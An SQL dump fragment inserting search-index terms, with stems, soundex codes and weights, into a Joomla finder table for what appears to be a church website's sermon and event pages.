(317909, 'sendable men isaiah', 'sendabl men isaiah', 0, 1, 1.6333, 'S531452', 1, '*'),
(317910, 'sendable there', 'sendabl there', 0, 1, 1.4667, 'S531436', 1, '*'),
(317911, 'sendable there are', 'sendabl there are', 0, 1, 1.6, 'S531436', 1, '*'),
(317912, 'sender', 'sender', 0, 0, 0.4, 'S536', 1, '*'),
(317913, 'sender and', 'sender and', 0, 1, 1.3333, 'S53653', 1, '*'),
(317914, 'sender and divine', 'sender and divine', 0, 1, 1.5667, 'S5365315', 1, '*'),
(317915, 'sending that', 'send that', 0, 1, 1.4, 'S53523', 1, '*'),
(317916, 'sending that god', 'send that god', 0, 1, 1.5333, 'S5352323', 1, '*'),
(317917, 'sending you', 'send you', 0, 1, 1.3667, 'S5352', 1, '*'),
(317918, 'sending you back', 'send you back', 0, 1, 1.5333, 'S535212', 1, '*'),
(317919, 'sending you to', 'send you to', 0, 1, 1.4667, 'S53523', 1, '*'),
(317920, 'sends', 'send', 0, 0, 0.3333, 'S532', 1, '*'),
(317921, 'sends you', 'send you', 0, 1, 1.3, 'S532', 1, '*'),
(317922, 'sends you to', 'send you to', 0, 1, 1.4, 'S5323', 1, '*'),
(317923, 'sent anytime', 'sent anytime', 0, 1, 1.4, 'S53535', 1, '*'),
(317924, 'sent anytime there', 'sent anytime there', 0, 1, 1.6, 'S5353536', 1, '*'),
(317925, 'sent him you', 'sent him you', 0, 1, 1.4, 'S535', 1, '*'),
(317926, 'sent man', 'sent man', 0, 1, 1.2667, 'S535', 1, '*'),
(317927, 'sent man didn\'t', 'sent man didn', 0, 1, 1.5, 'S535353', 1, '*'),
(317928, 'sent man in', 'sent man in', 0, 1, 1.3667, 'S535', 1, '*'),
(317929, 'sent man you', 'sent man you', 0, 1, 1.4, 'S535', 1, '*'),
(317930, 'sent me a', 'sent me a', 0, 1, 1.3, 'S535', 1, '*'),
(317931, 'sent me back', 'sent me back', 0, 1, 1.4, 'S53512', 1, '*'),
(317932, 'sent to', 'sent to', 0, 1, 1.2333, 'S530', 1, '*'),
(317933, 'sent to his', 'sent to his', 0, 1, 1.3667, 'S532', 1, '*'),
(317934, 'serious oppositions', 'seriou oppositions', 0, 1, 1.6333, 'S6212352', 1, '*'),
(317935, 'serious oppositions when', 'seriou oppositions when', 0, 1, 1.8, 'S62123525', 1, '*'),
(317936, 'showed me the', 'show me the', 0, 1, 1.4333, 'S353', 1, '*'),
(317937, 'somebody and', 'somebodi and', 0, 1, 1.4, 'S51353', 1, '*'),
(317938, 'somebody and you', 'somebodi and you', 0, 1, 1.5333, 'S51353', 1, '*'),
(317939, 'someone was', 'someon was', 0, 1, 1.3667, 'S520', 1, '*'),
(317940, 'someone was sent', 'someon was sent', 0, 1, 1.5333, 'S5253', 1, '*'),
(317941, 'something they', 'someth they', 0, 1, 1.4667, 'S53523', 1, '*'),
(317942, 'something they cannot', 'someth they cannot', 0, 1, 1.7, 'S53523253', 1, '*'),
(317943, 'special forces', 'special forces', 0, 1, 1.4667, 'S124162', 1, '*'),
(317944, 'special forces iii', 'special forces iii', 0, 1, 1.6, 'S124162', 1, '*'),
(317945, 'started the', 'start the', 0, 1, 1.3667, 'S363', 1, '*'),
(317946, 'started the ministry', 'start the ministry', 0, 1, 1.6667, 'S3635236', 1, '*'),
(317947, 'state nigeria', 'state nigeria', 0, 1, 1.4333, 'S3526', 1, '*'),
(317948, 'state nigeria to', 'state nigeria to', 0, 1, 1.5333, 'S35263', 1, '*'),
(317949, 'state your', 'state your', 0, 1, 1.3333, 'S360', 1, '*'),
(317950, 'state your office', 'state your office', 0, 1, 1.5667, 'S3612', 1, '*'),
(317951, 'stirred', 'stir', 0, 0, 0.4667, 'S363', 1, '*'),
(317952, 'stirred up', 'stir up', 0, 1, 1.3333, 'S3631', 1, '*'),
(317953, 'stirred up my', 'stir up my', 0, 1, 1.4333, 'S36315', 1, '*'),
(317954, 'stopped', 'stop', 0, 0, 0.4667, 'S313', 1, '*'),
(317955, 'stopped watching', 'stop watching', 0, 1, 1.5333, 'S313252', 1, '*'),
(317956, 'stopped watching over', 'stop watching over', 0, 1, 1.7, 'S31325216', 1, '*'),
(317957, 'such a place', 'such a place', 0, 1, 1.4, 'S142', 1, '*'),
(317958, 'take over', 'take over', 0, 1, 1.3, 'T216', 1, '*'),
(317959, 'take over europe', 'take over europe', 0, 1, 1.5333, 'T2161', 1, '*'),
(317960, 'take up this', 'take up this', 0, 1, 1.4, 'T2132', 1, '*'),
(317961, 'taken over', 'taken over', 0, 1, 1.3333, 'T2516', 1, '*'),
(317962, 'taken over in', 'taken over in', 0, 1, 1.4333, 'T25165', 1, '*'),
(317963, 'tell the lord', 'tell the lord', 0, 1, 1.4333, 'T43463', 1, '*'),
(317964, 'than christians', 'than christians', 0, 1, 1.5, 'T5262352', 1, '*'),
(317965, 'than christians .”', 'than christians .”', 0, 1, 1.6, 'T5262352', 1, '*'),
(317966, 'that are sendable', 'that are sendable', 0, 1, 1.5667, 'T625314', 1, '*'),
(317967, 'that call for', 'that call for', 0, 1, 1.4333, 'T2416', 1, '*'),
(317968, 'that have had', 'that have had', 0, 1, 1.4333, 'T130', 1, '*'),
(317969, 'that he came', 'that he came', 0, 1, 1.4, 'T250', 1, '*'),
(317970, 'that in our', 'that in our', 0, 1, 1.3667, 'T560', 1, '*'),
(317971, 'the carriers', 'the carriers', 0, 1, 1.4, 'T262', 1, '*'),
(317972, 'the carriers of', 'the carriers of', 0, 1, 1.5, 'T2621', 1, '*'),
(317973, 'the church that', 'the church that', 0, 1, 1.5, 'T2623', 1, '*'),
(317974, 'the consciousness of', 'the consciousness of', 0, 1, 1.6667, 'T252521', 1, '*'),
(317975, 'the convention', 'the convention', 0, 1, 1.4667, 'T251535', 1, '*'),
(317976, 'the convention is', 'the convention is', 0, 1, 1.5667, 'T2515352', 1, '*'),
(317977, 'the father\'s heart', 'the father heart', 0, 1, 1.6, 'T136263', 1, '*'),
(317978, 'the grace', 'the grace', 0, 1, 1.3, 'T262', 1, '*'),
(317979, 'the grace of', 'the grace of', 0, 1, 1.4, 'T2621', 1, '*'),
(317980, 'the land have', 'the land have', 0, 1, 1.4333, 'T4531', 1, '*'),
(317981, 'the land he', 'the land he', 0, 1, 1.3667, 'T453', 1, '*'),
(317982, 'the lord hear', 'the lord hear', 0, 1, 1.4333, 'T4636', 1, '*'),
(317983, 'the lord one', 'the lord one', 0, 1, 1.4, 'T4635', 1, '*'),
(317984, 'the lord today', 'the lord today', 0, 1, 1.4667, 'T463', 1, '*'),
(317985, 'the ministry but', 'the ministry but', 0, 1, 1.5333, 'T523613', 1, '*'),
(317986, 'the next 20-30', 'the next 20-30', 0, 1, 1.4667, 'T523', 1, '*'),
(317987, 'the one who', 'the one who', 0, 1, 1.3667, 'T500', 1, '*'),
(317988, 'the politicians', 'the politicians', 0, 1, 1.5, 'T143252', 1, '*'),
(317989, 'the politicians in', 'the politicians in', 0, 1, 1.6, 'T1432525', 1, '*'),
(317990, 'the revelation', 'the revelation', 0, 1, 1.4667, 'T61435', 1, '*'),
(317991, 'the revelation of', 'the revelation of', 0, 1, 1.5667, 'T614351', 1, '*'),
(317992, 'the sendable', 'the sendable', 0, 1, 1.4, 'T25314', 1, '*'),
(317993, 'the sendable men', 'the sendable men', 0, 1, 1.5333, 'T253145', 1, '*'),
(317994, 'the things god', 'the things god', 0, 1, 1.4667, 'T523', 1, '*'),
(317995, 'the town', 'the town', 0, 1, 1.2667, 'T500', 1, '*'),
(317996, 'the town i', 'the town i', 0, 1, 1.3333, 'T500', 1, '*'),
(317997, 'the u', 'the u', 0, 1, 1.1667, 'T000', 1, '*'),
(317998, 'the u k', 'the u k', 0, 1, 1.2333, 'T200', 1, '*'),
(317999, 'the watchmen', 'the watchmen', 0, 1, 1.4, 'T250', 1, '*'),
(318000, 'the watchmen over', 'the watchmen over', 0, 1, 1.5667, 'T2516', 1, '*'),
(318001, 'the world of', 'the world of', 0, 1, 1.4, 'T6431', 2, '*'),
(318002, 'the years”', 'the years”', 0, 1, 1.3333, 'T620', 1, '*'),
(318003, 'the years” and', 'the years” and', 0, 1, 1.4667, 'T6253', 1, '*'),
(318004, 'their god', 'their god', 0, 1, 1.3, 'T623', 1, '*'),
(318005, 'their god they', 'their god they', 0, 1, 1.4667, 'T623', 1, '*'),
(318006, 'them god does', 'them god does', 0, 1, 1.4333, 'T5232', 1, '*'),
(318007, 'them the only', 'them the only', 0, 1, 1.4333, 'T5354', 1, '*'),
(318008, 'then i', 'then i', 0, 1, 1.2, 'T500', 1, '*'),
(318009, 'then i took', 'then i took', 0, 1, 1.3667, 'T532', 1, '*'),
(318010, 'there are 3', 'there are 3', 0, 1, 1.3667, 'T600', 1, '*'),
(318011, 'there are different', 'there are different', 0, 1, 1.6333, 'T631653', 1, '*'),
(318012, 'there people', 'there people', 0, 1, 1.4, 'T614', 1, '*'),
(318013, 'there people were', 'there people were', 0, 1, 1.5667, 'T6146', 1, '*'),
(318014, 'there when', 'there when', 0, 1, 1.3333, 'T650', 1, '*'),
(318015, 'there when we', 'there when we', 0, 1, 1.4333, 'T650', 1, '*'),
(318016, 'they cannot', 'thei cannot', 0, 1, 1.3667, 'T253', 1, '*'),
(318017, 'they cannot withstand', 'thei cannot withstand', 0, 1, 1.7, 'T2532353', 1, '*'),
(318018, 'they will not', 'thei will not', 0, 1, 1.4333, 'T453', 1, '*'),
(318019, 'things god', 'thing god', 0, 1, 1.3333, 'T523', 1, '*'),
(318020, 'things god came', 'thing god came', 0, 1, 1.5, 'T52325', 1, '*'),
(318021, 'things had', 'thing had', 0, 1, 1.3333, 'T523', 1, '*'),
(318022, 'things had been', 'thing had been', 0, 1, 1.5, 'T52315', 1, '*'),
(318023, 'thingstook', 'thingstook', 0, 0, 0.6667, 'T5232', 1, '*'),
(318024, 'thingstook a', 'thingstook a', 0, 1, 1.4, 'T5232', 1, '*'),
(318025, 'thingstook a new', 'thingstook a new', 0, 1, 1.5333, 'T52325', 1, '*'),
(318026, 'this from', 'thi from', 0, 1, 1.3, 'T2165', 1, '*'),
(318027, 'this from today', 'thi from today', 0, 1, 1.5, 'T21653', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(318028, 'this mandate', 'thi mandate', 0, 1, 1.4, 'T253', 1, '*'),
(318029, 'this mandate god', 'thi mandate god', 0, 1, 1.5333, 'T25323', 1, '*'),
(318030, 'through evil', 'through evil', 0, 1, 1.4, 'T6214', 1, '*'),
(318031, 'through evil occultic', 'through evil occultic', 0, 1, 1.7, 'T62142432', 1, '*'),
(318032, 'to bless us', 'to bless us', 0, 1, 1.3667, 'T142', 1, '*'),
(318033, 'to commission', 'to commission', 0, 1, 1.4333, 'T2525', 1, '*'),
(318034, 'to commission us', 'to commission us', 0, 1, 1.5333, 'T25252', 1, '*'),
(318035, 'to do during', 'to do during', 0, 1, 1.4, 'T652', 1, '*'),
(318036, 'to fire', 'to fire', 0, 1, 1.2333, 'T160', 1, '*'),
(318037, 'to fire a', 'to fire a', 0, 1, 1.3, 'T160', 1, '*'),
(318038, 'to his family', 'to his family', 0, 1, 1.4333, 'T2154', 1, '*'),
(318039, 'to ijeshaland', 'to ijeshaland', 0, 1, 1.4333, 'T2453', 1, '*'),
(318040, 'to ijeshaland a', 'to ijeshaland a', 0, 1, 1.5, 'T2453', 1, '*'),
(318041, 'to influence the', 'to influence the', 0, 1, 1.5333, 'T514523', 1, '*'),
(318042, 'to me and', 'to me and', 0, 1, 1.3, 'T530', 1, '*'),
(318043, 'to my family', 'to my family', 0, 1, 1.4, 'T5154', 1, '*'),
(318044, 'to overcome me', 'to overcome me', 0, 1, 1.4667, 'T1625', 1, '*'),
(318045, 'to recruit', 'to recruit', 0, 1, 1.3333, 'T6263', 1, '*'),
(318046, 'to recruit the', 'to recruit the', 0, 1, 1.4667, 'T6263', 1, '*'),
(318047, 'to rescue', 'to rescue', 0, 1, 1.3, 'T620', 1, '*'),
(318048, 'to rescue young', 'to rescue young', 0, 1, 1.5, 'T6252', 1, '*'),
(318049, 'to such a', 'to such a', 0, 1, 1.3, 'T200', 1, '*'),
(318050, 'to take over', 'to take over', 0, 1, 1.4, 'T216', 1, '*'),
(318051, 'to take up', 'to take up', 0, 1, 1.3333, 'T210', 1, '*'),
(318052, 'to understand if', 'to understand if', 0, 1, 1.5333, 'T53623531', 1, '*'),
(318053, 'to your family', 'to your family', 0, 1, 1.4667, 'T6154', 1, '*'),
(318054, 'to your state', 'to your state', 0, 1, 1.4333, 'T623', 1, '*'),
(318055, 'today for', 'todai for', 0, 1, 1.3, 'T160', 1, '*'),
(318056, 'today for every', 'todai for every', 0, 1, 1.5, 'T1616', 1, '*'),
(318057, 'today god', 'todai god', 0, 1, 1.3, 'T230', 1, '*'),
(318058, 'today god wants', 'todai god wants', 0, 1, 1.5, 'T23532', 1, '*'),
(318059, 'today here', 'todai here', 0, 1, 1.3333, 'T600', 1, '*'),
(318060, 'today here am', 'todai here am', 0, 1, 1.4333, 'T650', 1, '*'),
(318061, 'today to take', 'todai to take', 0, 1, 1.4333, 'T200', 1, '*'),
(318062, 'told them the', 'told them the', 0, 1, 1.4333, 'T4353', 1, '*'),
(318063, 'took over', 'took over', 0, 1, 1.3, 'T216', 1, '*'),
(318064, 'took over and', 'took over and', 0, 1, 1.4333, 'T21653', 1, '*'),
(318065, 'town i', 'town i', 0, 1, 1.2, 'T500', 1, '*'),
(318066, 'town i challenge', 'town i challenge', 0, 1, 1.5333, 'T52452', 1, '*'),
(318067, 'town in', 'town in', 0, 1, 1.2333, 'T500', 1, '*'),
(318068, 'town in osun', 'town in osun', 0, 1, 1.4, 'T525', 1, '*'),
(318069, 'turn because', 'turn because', 0, 1, 1.4, 'T6512', 1, '*'),
(318070, 'turn because someone', 'turn because someone', 0, 1, 1.6667, 'T65125', 1, '*'),
(318071, 'u', 'u', 0, 0, 0.0667, 'U000', 1, '*'),
(318072, 'u k', 'u k', 0, 1, 1.1, 'U200', 1, '*'),
(318073, 'u k of', 'u k of', 0, 1, 1.2, 'U210', 1, '*'),
(318074, 'understand if', 'understand if', 0, 1, 1.4333, 'U53623531', 1, '*'),
(318075, 'understand if he', 'understand if he', 0, 1, 1.5333, 'U53623531', 1, '*'),
(318076, 'understand the power', 'understand the power', 0, 1, 1.6667, 'U536235316', 1, '*'),
(318077, 'up my', 'up my', 0, 1, 1.1667, 'U150', 1, '*'),
(318078, 'up my anger', 'up my anger', 0, 1, 1.3667, 'U1526', 1, '*'),
(318079, 'up this', 'up this', 0, 1, 1.2333, 'U132', 1, '*'),
(318080, 'up this mandate', 'up this mandate', 0, 1, 1.5, 'U13253', 1, '*'),
(318081, 'us come', 'us come', 0, 1, 1.2333, 'U250', 1, '*'),
(318082, 'us come to', 'us come to', 0, 1, 1.3333, 'U253', 1, '*'),
(318083, 'us god has', 'us god has', 0, 1, 1.3333, 'U232', 1, '*'),
(318084, 'us muhammad', 'us muhammad', 0, 1, 1.3667, 'U253', 1, '*'),
(318085, 'us muhammad gaddafi', 'us muhammad gaddafi', 0, 1, 1.6333, 'U253231', 1, '*'),
(318086, 'verse 8', 'vers 8', 0, 1, 1.2333, 'V620', 1, '*'),
(318087, 'verse 8 says', 'vers 8 says', 0, 1, 1.4, 'V620', 1, '*'),
(318088, 'vicinity', 'vicin', 0, 0, 0.5333, 'V253', 1, '*'),
(318089, 'vicinity to', 'vicin to', 0, 1, 1.3667, 'V253', 1, '*'),
(318090, 'vicinity to influence', 'vicin to influence', 0, 1, 1.7, 'V25351452', 1, '*'),
(318091, 'wants me', 'want me', 0, 1, 1.2667, 'W5325', 2, '*'),
(318092, 'wants me to', 'want me to', 0, 1, 1.3667, 'W53253', 2, '*'),
(318093, 'was minding', 'wa minding', 0, 1, 1.3667, 'W25352', 1, '*'),
(318094, 'was minding my', 'wa minding my', 0, 1, 1.4667, 'W253525', 1, '*'),
(318095, 'was sent', 'wa sent', 0, 1, 1.2667, 'W253', 1, '*'),
(318096, 'was sent to', 'wa sent to', 0, 1, 1.3667, 'W253', 1, '*'),
(318097, 'watching over', 'watch over', 0, 1, 1.4333, 'W325216', 1, '*'),
(318098, 'watching over the', 'watch over the', 0, 1, 1.5667, 'W3252163', 1, '*'),
(318099, 'watchmen', 'watchmen', 0, 0, 0.5333, 'W325', 1, '*'),
(318100, 'watchmen over', 'watchmen over', 0, 1, 1.4333, 'W32516', 1, '*'),
(318101, 'watchmen over the', 'watchmen over the', 0, 1, 1.5667, 'W325163', 1, '*'),
(318102, 'way you will', 'wai you will', 0, 1, 1.4, 'W400', 1, '*'),
(318103, 'we got', 'we got', 0, 1, 1.2, 'W230', 1, '*'),
(318104, 'we got there', 'we got there', 0, 1, 1.4, 'W236', 1, '*'),
(318105, 'we send', 'we send', 0, 1, 1.2333, 'W253', 1, '*'),
(318106, 'we send not', 'we send not', 0, 1, 1.3667, 'W25353', 1, '*'),
(318107, 'went there', 'went there', 0, 1, 1.3333, 'W536', 1, '*'),
(318108, 'went there when', 'went there when', 0, 1, 1.5, 'W5365', 1, '*'),
(318109, 'were wondering', 'were wondering', 0, 1, 1.4667, 'W653652', 1, '*'),
(318110, 'were wondering how', 'were wondering how', 0, 1, 1.6, 'W653652', 1, '*'),
(318111, 'when i got', 'when i got', 0, 1, 1.3333, 'W523', 1, '*'),
(318112, 'when we got', 'when we got', 0, 1, 1.3667, 'W523', 1, '*'),
(318113, 'where god has', 'where god has', 0, 1, 1.4333, 'W6232', 1, '*'),
(318114, 'who can we', 'who can we', 0, 1, 1.3333, 'W250', 1, '*'),
(318115, 'who sent', 'who sent', 0, 1, 1.2667, 'W253', 1, '*'),
(318116, 'who sent him', 'who sent him', 0, 1, 1.4, 'W2535', 1, '*'),
(318117, 'who sent me', 'who sent me', 0, 1, 1.3667, 'W2535', 1, '*'),
(318118, 'who shall', 'who shall', 0, 1, 1.3, 'W240', 1, '*'),
(318119, 'who shall i', 'who shall i', 0, 1, 1.3667, 'W240', 1, '*'),
(318120, 'whom he has', 'whom he has', 0, 1, 1.3667, 'W520', 1, '*'),
(318121, 'whose ancestors', 'whose ancestors', 0, 1, 1.5, 'W252362', 1, '*'),
(318122, 'whose ancestors have', 'whose ancestors have', 0, 1, 1.6667, 'W2523621', 1, '*'),
(318123, 'will be more', 'will be more', 0, 1, 1.4, 'W4156', 1, '*'),
(318124, 'will not need', 'will not need', 0, 1, 1.4333, 'W45353', 1, '*'),
(318125, 'will you tell', 'will you tell', 0, 1, 1.4333, 'W434', 1, '*'),
(318126, 'with his people', 'with his people', 0, 1, 1.5, 'W3214', 1, '*'),
(318127, 'with the politicians', 'with the politicians', 0, 1, 1.6667, 'W3143252', 1, '*'),
(318128, 'withstand he', 'withstand he', 0, 1, 1.4, 'W32353', 1, '*'),
(318129, 'withstand he equips', 'withstand he equips', 0, 1, 1.6333, 'W32353212', 1, '*'),
(318130, 'wondering how', 'wonder how', 0, 1, 1.4333, 'W53652', 1, '*'),
(318131, 'wondering how could', 'wonder how could', 0, 1, 1.6333, 'W5365243', 1, '*'),
(318132, 'world of intellectuals', 'world of intellectuals', 0, 1, 1.7333, 'W64315342342', 1, '*'),
(318133, 'world today', 'world today', 0, 1, 1.3667, 'W643', 1, '*'),
(318134, 'world today there', 'world today there', 0, 1, 1.5667, 'W6436', 1, '*'),
(318135, 'wrongly', 'wrongli', 0, 0, 0.4667, 'W6524', 1, '*'),
(318136, 'wrongly before', 'wrongli before', 0, 1, 1.4667, 'W652416', 1, '*'),
(318137, 'wrongly before then', 'wrongli before then', 0, 1, 1.6333, 'W65241635', 1, '*'),
(318138, 'years there', 'year there', 0, 1, 1.3667, 'Y6236', 1, '*'),
(318139, 'years there will', 'year there will', 0, 1, 1.5333, 'Y62364', 1, '*'),
(318140, 'years”', 'years”', 0, 0, 0.4, 'Y620', 1, '*'),
(318141, 'years” and', 'years” and', 0, 1, 1.3333, 'Y6253', 1, '*'),
(318142, 'years” and i', 'years” and i', 0, 1, 1.4, 'Y6253', 1, '*'),
(318143, 'you are no', 'you are no', 0, 1, 1.3333, 'Y650', 1, '*'),
(318144, 'you are you', 'you are you', 0, 1, 1.3667, 'Y600', 1, '*'),
(318145, 'you at gobc', 'you at gobc', 0, 1, 1.3667, 'Y3212', 1, '*'),
(318146, 'you back to', 'you back to', 0, 1, 1.3667, 'Y123', 1, '*'),
(318147, 'you can overcome', 'you can overcome', 0, 1, 1.5333, 'Y251625', 1, '*'),
(318148, 'you for jesus', 'you for jesus', 0, 1, 1.4333, 'Y162', 1, '*'),
(318149, 'you god is', 'you god is', 0, 1, 1.3333, 'Y232', 2, '*'),
(318150, 'you make yourself', 'you make yourself', 0, 1, 1.5667, 'Y526241', 1, '*'),
(318151, 'you part', 'you part', 0, 1, 1.2667, 'Y163', 1, '*'),
(318152, 'you part of', 'you part of', 0, 1, 1.3667, 'Y1631', 1, '*'),
(318153, 'you say that', 'you say that', 0, 1, 1.4, 'Y230', 1, '*'),
(318154, 'you sendable', 'you sendable', 0, 1, 1.4, 'Y25314', 1, '*'),
(318155, 'you sendable from', 'you sendable from', 0, 1, 1.5667, 'Y25314165', 1, '*'),
(318156, 'you sendable there', 'you sendable there', 0, 1, 1.6, 'Y2531436', 1, '*'),
(318157, 'you something', 'you something', 0, 1, 1.4333, 'Y25352', 1, '*'),
(318158, 'you something they', 'you something they', 0, 1, 1.6, 'Y253523', 1, '*'),
(318159, 'you tell', 'you tell', 0, 1, 1.2667, 'Y340', 1, '*'),
(318160, 'you tell the', 'you tell the', 0, 1, 1.4, 'Y343', 1, '*'),
(318161, 'you to ijeshaland', 'you to ijeshaland', 0, 1, 1.5667, 'Y32453', 1, '*'),
(318162, 'you to understand', 'you to understand', 0, 1, 1.5667, 'Y35362353', 1, '*'),
(318163, 'you today to', 'you today to', 0, 1, 1.4, 'Y300', 1, '*'),
(318164, 'young people', 'young people', 0, 1, 1.4, 'Y5214', 1, '*'),
(318165, 'young people like', 'young people like', 0, 1, 1.5667, 'Y52142', 1, '*'),
(318166, 'young people whose', 'young people whose', 0, 1, 1.6, 'Y52142', 1, '*'),
(318167, 'your assignment some', 'your assignment some', 0, 1, 1.6667, 'Y625325', 1, '*'),
(318168, 'your family when', 'your family when', 0, 1, 1.5333, 'Y61545', 1, '*'),
(318169, 'your office', 'your office', 0, 1, 1.3667, 'Y612', 1, '*'),
(318170, 'your office your', 'your office your', 0, 1, 1.5333, 'Y6126', 1, '*'),
(318171, 'your state', 'your state', 0, 1, 1.3333, 'Y623', 1, '*'),
(318172, 'your state your', 'your state your', 0, 1, 1.5, 'Y6236', 1, '*'),
(318173, 'your vicinity', 'your vicinity', 0, 1, 1.4333, 'Y61253', 1, '*'),
(318174, 'your vicinity to', 'your vicinity to', 0, 1, 1.5333, 'Y61253', 1, '*'),
(318175, 'yourself one', 'yourself one', 0, 1, 1.4, 'Y62415', 1, '*'),
(318176, 'yourself one there', 'yourself one there', 0, 1, 1.6, 'Y6241536', 1, '*'),
(318177, '“by', '“by', 0, 0, 0.2, '“100', 1, '*'),
(318178, '“by the', '“by the', 0, 1, 1.2333, '“130', 1, '*'),
(318179, '“by the grace', '“by the grace', 0, 1, 1.4333, '“13262', 1, '*'),
(318417, '16 jer', '16 jer', 0, 1, 1.2, 'J600', 1, '*'),
(318418, '16 jer 33', '16 jer 33', 0, 1, 1.3, 'J600', 1, '*'),
(318419, '18 45', '18 45', 0, 1, 1.1667, '', 1, '*'),
(318420, '18 45 isaiah', '18 45 isaiah', 0, 1, 1.4, 'I200', 1, '*'),
(318421, '26 jer', '26 jer', 0, 1, 1.2, 'J600', 1, '*'),
(318422, '26 jer 30', '26 jer 30', 0, 1, 1.3, 'J600', 1, '*'),
(318423, '30 16', '30 16', 0, 1, 1.1667, '', 1, '*'),
(318424, '30 16 jer', '30 16 jer', 0, 1, 1.3, 'J600', 1, '*'),
(318425, '30 17', '30 17', 0, 1, 1.1667, '', 1, '*'),
(318426, '33 6', '33 6', 0, 1, 1.1333, '', 1, '*'),
(318427, '33 6 jer', '33 6 jer', 0, 1, 1.2667, 'J600', 1, '*'),
(318428, '45 isaiah', '45 isaiah', 0, 1, 1.3, 'I200', 1, '*'),
(318429, '45 isaiah 49', '45 isaiah 49', 0, 1, 1.4, 'I200', 1, '*'),
(318430, '49 26 jer', '49 26 jer', 0, 1, 1.3, 'J600', 1, '*'),
(318431, '58 victory', '58 victory', 0, 1, 1.3333, 'V236', 1, '*'),
(318432, '58 victory over', '58 victory over', 0, 1, 1.5, 'V23616', 1, '*'),
(318433, '6 jer', '6 jer', 0, 1, 1.1667, 'J600', 1, '*'),
(318434, '6 jer 30', '6 jer 30', 0, 1, 1.2667, 'J600', 1, '*'),
(318435, 'and heicobater', 'and heicobater', 0, 1, 1.4667, 'A532136', 1, '*'),
(318436, 'and heicobater pylori', 'and heicobater pylori', 0, 1, 1.7, 'A532136146', 1, '*'),
(318437, 'bacteria', 'bacteria', 0, 0, 0.5333, 'B236', 1, '*'),
(318438, 'bacteria scriptures', 'bacteria scriptures', 0, 1, 1.6333, 'B236261362', 1, '*'),
(318439, 'bacteria scriptures psalm', 'bacteria scriptures psalm', 0, 1, 1.8333, 'B2362613621245', 1, '*'),
(318440, 'heicobater', 'heicobat', 0, 0, 0.6667, 'H2136', 1, '*'),
(318441, 'heicobater pylori', 'heicobat pylori', 0, 1, 1.5667, 'H2136146', 1, '*'),
(318442, 'heicobater pylori bacteria', 'heicobat pylori bacteria', 0, 1, 1.8667, 'H21361461236', 1, '*'),
(318443, 'isaiah 49', 'isaiah 49', 0, 1, 1.3, 'I200', 1, '*'),
(318444, 'isaiah 49 26', 'isaiah 49 26', 0, 1, 1.4, 'I200', 1, '*'),
(318445, 'item 58', 'item 58', 0, 1, 1.2333, 'I350', 1, '*'),
(318446, 'item 58 victory', 'item 58 victory', 0, 1, 1.5, 'I351236', 1, '*'),
(318447, 'jer', 'jer', 0, 0, 0.2, 'J600', 1, '*'),
(318448, 'jer 30', 'jer 30', 0, 1, 1.2, 'J600', 1, '*'),
(318449, 'jer 30 16', 'jer 30 16', 0, 1, 1.3, 'J600', 1, '*'),
(318450, 'jer 30 17', 'jer 30 17', 0, 1, 1.3, 'J600', 1, '*'),
(318451, 'jer 33', 'jer 33', 0, 1, 1.2, 'J600', 1, '*'),
(318452, 'jer 33 6', 'jer 33 6', 0, 1, 1.2667, 'J600', 1, '*'),
(318453, 'k2 item 58', 'k2 item 58', 0, 1, 1.3333, 'K350', 1, '*'),
(318454, 'over ulcers', 'over ulcers', 0, 1, 1.3667, 'O164262', 1, '*'),
(318455, 'over ulcers and', 'over ulcers and', 0, 1, 1.5, 'O16426253', 1, '*'),
(318456, 'psalm 18', 'psalm 18', 0, 1, 1.2667, 'P245', 1, '*'),
(318457, 'psalm 18 45', 'psalm 18 45', 0, 1, 1.3667, 'P245', 1, '*'),
(318458, 'pylori', 'pylori', 0, 0, 0.4, 'P460', 1, '*'),
(318459, 'pylori bacteria', 'pylori bacteria', 0, 1, 1.5, 'P461236', 1, '*'),
(318460, 'pylori bacteria scriptures', 'pylori bacteria scriptures', 0, 1, 1.8667, 'P461236261362', 1, '*'),
(318461, 'scriptures psalm', 'scriptur psalm', 0, 1, 1.5333, 'S613621245', 1, '*'),
(318462, 'scriptures psalm 18', 'scriptur psalm 18', 0, 1, 1.6333, 'S613621245', 1, '*'),
(318463, 'ulcers', 'ulcer', 0, 0, 0.4, 'U4262', 1, '*'),
(318464, 'ulcers and', 'ulcer and', 0, 1, 1.3333, 'U426253', 1, '*'),
(318465, 'ulcers and heicobater', 'ulcer and heicobater', 0, 1, 1.7, 'U4262532136', 1, '*'),
(318466, 'victory over', 'victori over', 0, 1, 1.4, 'V23616', 1, '*'),
(318467, 'victory over ulcers', 'victori over ulcers', 0, 1, 1.6333, 'V236164262', 1, '*'),
(318468, '+234', '+234', 0, 0, 0.4, '', 1, '*'),
(318469, '+234 803', '+234 803', 0, 1, 1.2667, '', 1, '*'),
(318470, '+234 803 725', '+234 803 725', 0, 1, 1.4, '', 1, '*'),
(318471, '+234 803 849', '+234 803 849', 0, 1, 1.4, '', 1, '*'),
(318472, '+23407060930809', '+23407060930809', 0, 0, 1.5, '', 1, '*'),
(318473, '+23407060930809 +234', '+23407060930809 +234', 0, 1, 1.6667, '', 1, '*'),
(318474, '+23407060930809 +234 803', '+23407060930809 +234 803', 0, 1, 1.8, '', 1, '*'),
(318475, '01.04.2018', '01.04.2018', 0, 0, 1, '', 1, '*'),
(318476, '01.04.2018 sixth', '01.04.2018 sixth', 0, 1, 1.5333, 'S300', 1, '*'),
(318477, '01.04.2018 sixth session', '01.04.2018 sixth session', 0, 1, 1.8, 'S325', 1, '*'),
(318478, '12noon', '12noon', 0, 0, 0.4, 'N000', 1, '*'),
(318479, '12noon fifth', '12noon fifth', 0, 1, 1.4, 'N130', 1, '*'),
(318480, '12noon fifth session', '12noon fifth session', 0, 1, 1.6667, 'N1325', 1, '*'),
(318481, '12noon venue', '12noon venue', 0, 1, 1.4, 'N150', 1, '*'),
(318482, '12noon venue the', '12noon venue the', 0, 1, 1.5333, 'N153', 1, '*'),
(318483, '1st', '1st', 0, 0, 0.2, 'S300', 1, '*'),
(318484, '1st april', '1st april', 0, 1, 1.3, 'S3164', 1, '*'),
(318485, '1st april 2018', '1st april 2018', 0, 1, 1.4667, 'S3164', 1, '*'),
(318486, '2018', '2018', 0, 0, 0.4, '', 3, '*'),
(318487, '2018 annual', '2018 annual', 0, 1, 1.3667, 'A540', 1, '*'),
(318488, '2018 annual easter', '2018 annual easter', 0, 1, 1.6, 'A54236', 1, '*'),
